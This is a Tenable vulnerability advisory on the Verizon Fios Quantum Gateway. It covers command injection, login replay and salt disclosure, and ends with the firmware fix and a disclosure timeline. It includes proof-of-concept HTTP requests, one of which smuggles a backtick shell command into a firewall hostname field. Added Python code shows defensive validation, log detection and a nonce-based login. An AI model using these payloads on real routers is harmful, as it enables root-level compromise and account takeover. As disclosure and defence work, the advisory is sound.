
Verizon Fios Quantum Gateway Multiple Vulnerabilities

High

Synopsis

Tenable has discovered multiple vulnerabilities in the Verizon Fios Quantum Gateway.

CVE-2019-3914: Authenticated Command Injection

A command injection vulnerability was discovered in the API backend. This vulnerability can be exploited remotely to achieve command execution with root privileges. An attacker must be authenticated to the device's administrative web application in order to perform the command injection.

This issue exists due to the way firewall access control rules are processed. Specifically, the vulnerability can be triggered by adding an access control rule for a network object with a crafted host name.

For example, if a network object is added with a hostname of "`whoami`" (note the backticks), and this object is used in a firewall access control rule, the 'whoami' command will be executed.

Below is a log entry in /chroot/mnt/log/user. Notice that `whoami` is incorporated into the iptables command.

user.err bhr4: Firewall.AccessControlRulesLog: Failed to delete rules: iptables -A AC_B_1_NWOBJ_1 -s `whoami` -j AC_B_1_SERVICES

Below is a proof of concept HTTP request. Note that the results of the command will not be returned. Please note that it is possible to obtain a root shell.

POST /api/firewall/accesscontrol HTTP/1.1
Host: 192.168.1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.11.1
X-XSRF-TOKEN: 1eaa16ee9264d388574253cfd0a2357e8c47718f9b4b8ac43b93c1571e0cdcda8ad3ad368389254bf4851ed68b3cc264a03003b477f59f33dc35c725fd0f6c89
Cookie: Session=944817705; XSRF-TOKEN=1eaa16ee9264d388574253cfd0a2357e8c47718f9b4b8ac43b93c1571e0cdcda8ad3ad368389254bf4851ed68b3cc264a03003b477f59f33dc35c725fd0f6c89
Content-Length: 373
Content-Type: application/json
 
{"blockRule": true, "schedule": "", "networkObjects": [{"rules": [{"hostname": "`whoami`", "networkObjType": 4}], "type": 3, "name": "Scooby"}], "enabled": true, "hosts": [], "schedule1": {}, "services": []}
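The root cause described above is a host name reaching a shell-interpreted iptables command line intact. As an added example (not the gateway's firmware code, whose source is not on the page), the block below contrasts the interpolation pattern consistent with the logged command with a hardened version that allow-lists the operand and builds an argv list for a shell-free subprocess call, and adds a check that flags AccessControlRulesLog entries whose -s operand is not a plain host name or network. The chain names, the log format and the sample lines are taken from or modelled on the entry quoted above.

```python
import ipaddress
import re

# RFC 1123 label: letters, digits, hyphens; 1-63 chars; no leading/trailing hyphen.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")
_LOG_SOURCE = re.compile(r"iptables .*?-s (\S+)")

def is_valid_hostname(name):
    """Allow-list check: only RFC 1123 syntax passes, so backticks, $( ), ; and | never do."""
    if not name or len(name) > 253:
        return False
    return all(_LABEL.match(label) for label in name.rstrip(".").split("."))

def is_valid_source(value):
    """A firewall -s operand may also be an IP address or a CIDR network."""
    if is_valid_hostname(value):
        return True
    try:
        ipaddress.ip_network(value, strict=False)
        return True
    except ValueError:
        return False

def vulnerable_rule_command(chain, hostname, target):
    """Assumed shape of the bug: one interpolated string handed to a shell. Backticks survive untouched; returned only for illustration, never executed."""
    return f"iptables -A {chain} -s {hostname} -j {target}"

def hardened_rule_argv(chain, hostname, target):
    """Validate first, then build an argv list for subprocess.run(argv): no shell, no expansion."""
    if not is_valid_source(hostname):
        raise ValueError(f"rejected firewall source: {hostname!r}")
    return ["iptables", "-A", chain, "-s", hostname, "-j", target]

def suspicious_rule_entries(log_lines):
    """Detection: return -s operands from AccessControlRulesLog lines that are not a host or network. The operand is read up to the first space, enough to catch shell metacharacters."""
    hits = []
    for line in log_lines:
        if "Firewall.AccessControlRulesLog" not in line:
            continue
        m = _LOG_SOURCE.search(line)
        if m and not is_valid_source(m.group(1)):
            hits.append(m.group(1))
    return hits

# Constructed sample log lines modelled on the /chroot/mnt/log/user entry quoted in the advisory.
SAMPLE_LOG = [
    "user.err bhr4: Firewall.AccessControlRulesLog: Failed to delete rules: iptables -A AC_B_1_NWOBJ_1 -s `whoami` -j AC_B_1_SERVICES",
    "user.info bhr4: Firewall.AccessControlRulesLog: Added rule: iptables -A AC_B_1_NWOBJ_2 -s printer.lan -j AC_B_1_SERVICES",
]
```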

CVE-2019-3915: Login Replay

The login process is susceptible to replay. Given that HTTPS is not enforced, an attacker could intercept a login request and subsequently replay it to gain access to the router's administrative web interface.

When a user attempts to log in, a salted SHA-512 password hash is POSTed. This is all the attacker needs to log in. For instance, a login request looks like this:

POST /api/login HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/
Content-Type: application/json;charset=utf-8
Content-Length: 143
Connection: close
Cookie: test
 
{"password":"5e619e19824b1072f89ff309e3896b1b6dd31aebfab1698b2662d97352d9da9fbdbf7c165239a2214bdf9ae512821e78875a1b515bd4140ec919dda201f1001e"}
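The request above works on replay because the posted hash is itself the credential. As an added illustration (not the gateway's code and not the vendor's fix, which is the firmware update), the block below places a verifier that compares the posted hash directly beside one bound to a single-use server nonce, so that the same captured proof is rejected the second time. The salt is the value returned by the unauthenticated /api response quoted later in this advisory; the salt + password concatenation order is an assumption, since the page does not state it.

```python
import hashlib
import hmac
import secrets

# Salt value quoted in the advisory's unauthenticated /api response. The concatenation
# order used by the device is not stated on the page, so salt + password is assumed here.
SALT = "6299bfce-1d56-4a6c-9bd8-352dc9ce865c"

def client_hash(password, salt=SALT):
    """The salted SHA-512 the page says the client POSTs in {"password": ...}."""
    return hashlib.sha512((salt + password).encode()).hexdigest()

class ReplayableLogin:
    """Check as the page describes it: the posted hash alone decides, so a captured request logs in again verbatim."""
    def __init__(self, stored_hash):
        self.stored = stored_hash
    def login(self, posted_hash):
        return hmac.compare_digest(posted_hash, self.stored)

class NonceBoundLogin:
    """Illustrative replay-resistant check: the server issues a single-use nonce and the
    client sends HMAC(client_hash, nonce) instead of the hash itself."""
    def __init__(self, stored_hash):
        self.stored = stored_hash
        self.outstanding = set()
    def challenge(self):
        nonce = secrets.token_hex(16)
        self.outstanding.add(nonce)
        return nonce
    def login(self, nonce, proof):
        if nonce not in self.outstanding:
            return False                  # unknown or already consumed nonce: replay
        self.outstanding.discard(nonce)   # burn it before checking, even on a bad proof
        expected = client_proof(self.stored, nonce)
        return hmac.compare_digest(proof, expected)

def client_proof(password_hash, nonce):
    return hmac.new(password_hash.encode(), nonce.encode(), hashlib.sha512).hexdigest()

def demo():
    """Returns (first login accepted, replay of the same message accepted) for each scheme."""
    h = client_hash("correct horse")          # constructed sample password
    weak = ReplayableLogin(h)
    weak_first, weak_replay = weak.login(h), weak.login(h)
    strong = NonceBoundLogin(h)
    n = strong.challenge()
    p = client_proof(h, n)
    strong_first, strong_replay = strong.login(n, p), strong.login(n, p)
    return (weak_first, weak_replay), (strong_first, strong_replay)
```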

CVE-2019-3916: Password Salt Information Disclosure

An unauthenticated attacker is able to retrieve the value of the password salt by simply visiting a URL in a web browser. Given that the firmware does not enforce the use of HTTPS, it is feasible for an attacker to capture (sniff) a login request. The login request contains a salted password hash (SHA-512), so the attacker could then perform an offline dictionary attack to recover the original password.

Below is a proof of concept HTTP request/response pair. Notice that the 'passwordSalt' is returned.

GET /api HTTP/1.1
Host: 192.168.1.1
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: test; bhr4UI2HasToRefresh=false; bhr4HasEnteredAdvanced=true; Session=; XSRF-TOKEN=

HTTP/1.1 401 Unauthorized
Cache-Control: no-cache
Content-Type: application/json; charset=utf-8
Content-Length: 173
Date: Thu, 06 Dec 2018 13:00:40 GMT
Server: lighttpd/1.4.38
 
{"doSetupWizard":false,"requirePassword":true,"passwordSalt":"6299bfce-1d56-4a6c-9bd8-352dc9ce865c","isWireless":false,"error":1,"maxUsers":10,"denyState":0,"denyTimeout":0}

Solution

Upgrade to firmware version 02.02.00.13.

Disclosure Timeline

12/11/2018 - Disclosed to vendor. 90-day date is 03/12/2019.
12/12/2018 - Verizon Incident Response Team replies saying that the Python attachment was blocked. Tenable is asked to follow up with our point of contact.
12/12/2018 - Tenable replies, stating that we do not have a point of contact. We ask that our message is routed to the proper person.
12/14/2018 - No response was received from Verizon. Tenable follows up to determine the proper way of communicating.
12/14/2018 - Tenable receives an automated reply, assigning a reference number of 2018121418229.
12/14/2018 - Tenable receives a human response, indicating that we may send our disclosure and PoC. The 90-day date is moved to 3/14/2019 as a professional courtesy.
12/14/2018 - Tenable resends the disclosure and PoC.
12/14/2018 - Tenable receives an automated reply, assigning a reference number of 2018121418773.
12/14/2018 - Verizon contacts Tenable to ask for PoC.
12/14/2018 - Tenable resends the PoC again.
12/14/2018 - Verizon acknowledges they have received the PoC.
12/14/2018 - Verizon indicates that the command injection has been validated. They have opened a ticket with their vendor to address the issue, and they will send a follow-up email once a fix is confirmed.
12/17/2018 - Tenable asks if the other two bugs have been validated.
12/19/2018 - Verizon responds that the other two bugs will be "officially" handled by another group. In an unofficial capacity, these bugs were previously identified and on the roadmap to be remediated. The RCE was new, though.
12/19/2018 - Verizon responds again: "Verizon has examined the data provided and we are actively working with our engineering teams and vendor to evaluate and, as appropriate, address the reported vulnerabilities in a timely manner."
12/19/2018 - Tenable asks Verizon to keep us in the loop with any updates.
01/04/2019 - Tenable asks for an update.
01/04/2019 - Vecirt says they are still testing and validating the report. They will "take appropriate actions, including making required updates in a timely manner, if needed."
01/04/2019 - Tenable reaches out to another contact, hoping to gain more insight.
01/22/2019 - Tenable follows up: reminds Verizon of the 90-day date, asks for an update, and asks for a preferred direct contact.
01/23/2019 - Tenable informs Verizon that CVE-2019-3914 through CVE-2019-3916 will be assigned for the discovered vulnerabilities.
01/23/2019 - Verizon responds. They are "still testing and will take appropriate actions, including making required updates in a timely manner, if needed." They will "have a response for the public report before the March 14, 2019 date."
01/24/2019 - Tenable asks if Verizon has a particular date in mind.
01/29/2019 - Verizon does "not have a specific anticipated date of completion." Nevertheless, they "certainly plan to continue providing updates to you as our validation and testing efforts progress, and are completed."
02/13/2019 - Tenable asks Verizon for an update.
02/19/2019 - Verizon says the bugs will be fixed in firmware version 2.2, and it will be deployed in the near future.
02/19/2019 - Tenable asks when version 2.2 will be deployed.
03/01/2019 - Verizon pushes firmware version 02.02.00.13.
03/01/2019 - Tenable notifies Verizon of intent to publish a research advisory prior to 3/14. Asks if Verizon plans to issue an advisory.
03/01/2019 - Verizon notifies Tenable that firmware updates are pushed in small batches, and the process won't be complete until March 13. Tenable is asked to delay an advisory until March 14th.
03/01/2019 - Tenable acknowledges the request and asks if Verizon plans to issue a security advisory.
03/04/2019 - Tenable agrees to wait until the 14th. Asks again whether Verizon will issue a security advisory.
03/05/2019 - Verizon says they will not issue an advisory. They will notify Tenable when the firmware update is fully deployed.
03/13/2019 - Verizon notifies Tenable that firmware updates have been fully deployed.
04/05/2019 - Verizon informs Tenable that a small percentage of their customers still need to be patched against these vulnerabilities.
04/09/2019 - Tenable releases the research advisory.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]
